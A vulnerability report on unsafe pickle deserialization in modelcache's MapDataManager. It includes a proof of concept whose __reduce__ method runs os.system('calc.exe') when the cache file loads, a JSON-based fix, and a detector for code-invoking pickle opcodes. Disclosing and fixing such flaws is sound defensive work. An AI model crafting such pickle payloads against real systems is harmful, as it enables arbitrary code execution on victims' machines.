Description
Hi,
I've discovered a critical vulnerability in the MapDataManager class where pickle.load is used to deserialize cached data from a file. The use of pickle is inherently unsafe as it can execute arbitrary Python code during deserialization. This poses a significant risk, such as enabling remote code execution (RCE) by deserializing malicious objects.
PoC
Below is a simple PoC for this issue; I also attach a picture with a 'dir' payload for your reference.
```python
import pickle
import os
from modelcache.manager import get_data_manager

# Malicious class that executes arbitrary code when deserialized
class Exploit:
    def __reduce__(self):
        return (os.system, ('calc.exe',))  # calc.exe for windows

malicious_payload = pickle.dumps(Exploit())
with open("data_map.txt", "wb") as f:  # Using data_map.txt like in factory.py
    f.write(malicious_payload)

# Simulate loading the malicious cache file
data_manager = get_data_manager(data_path="data_map.txt", max_size=1000)
```
While the example Flask application uses SQLite as the cache base, similar risks could arise if user-controlled data is cached into the database and subsequently deserialized.
Recommendation
To mitigate this issue, I strongly recommend avoiding pickle for serialization. Safer alternatives like JSON or MessagePack should be used, as they do not allow code execution.
Thanks.
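The recommendation above, as an added example that is not part of this report or of the modelcache project: a hypothetical JSON-based `save_map`/`load_map` pair that replaces the pickle cache file, plus a `pickletools`-based check that refuses a cache file containing code-invoking pickle opcodes without ever loading it. The function names, `SAMPLE_MAP` and the entry shape are assumptions.

```python
import json
import os
import pickle
import pickletools
import tempfile

# Hypothetical JSON replacement for the pickle cache file; this is not modelcache's own code.
# Pickle opcodes that resolve or call a callable; a data-only pickle never contains them.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}
SAMPLE_MAP = {"id-1": ["what is 2+2?", "4"]}  # constructed sample; the entry shape is illustrative

def pickle_code_opcodes(raw: bytes) -> set:
    """Code-invoking opcodes in a pickle stream, found by parsing (never loading) it; non-pickle bytes give set()."""
    try:
        return {op.name for op, _, _ in pickletools.genops(raw)} & CODE_OPCODES
    except Exception:
        return set()

def save_map(path: str, data: dict) -> None:
    with open(path, "w", encoding="utf-8") as f:  # string keys and JSON-native values only
        json.dump(data, f)

def load_map(path: str) -> dict:
    """json.loads builds only dict/list/str/number/bool/None, so no __reduce__ hook can ever run."""
    with open(path, "rb") as f:
        raw = f.read()
    found = pickle_code_opcodes(raw)
    if found:  # legacy or tampered pickle cache: refuse it and report what it would have invoked
        raise ValueError(f"{path}: pickle cache with code-invoking opcodes {sorted(found)}")
    return json.loads(raw.decode("utf-8"))  # any other non-JSON content fails here as a ValueError

class _Caller:  # benign stand-in for the PoC class: its pickle calls len("abc") and nothing else
    def __reduce__(self):
        return (len, ("abc",))

BENIGN_PICKLE = pickle.dumps({"a": [1, 2]})  # data-only pickle: the detector stays quiet on it
CALLING_PICKLE = pickle.dumps(_Caller())  # carries a global lookup plus REDUCE, like the PoC payload

def self_check() -> bool:
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "data_map.txt")  # same file name the PoC writes
        save_map(path, SAMPLE_MAP)
        ok = load_map(path) == SAMPLE_MAP  # JSON round-trip works
        with open(path, "wb") as f:
            f.write(CALLING_PICKLE)  # now the cache holds a pickle with a callable in it
        try:
            load_map(path)
            return False  # the pickle was accepted: the guard failed
        except ValueError:
            return ok
```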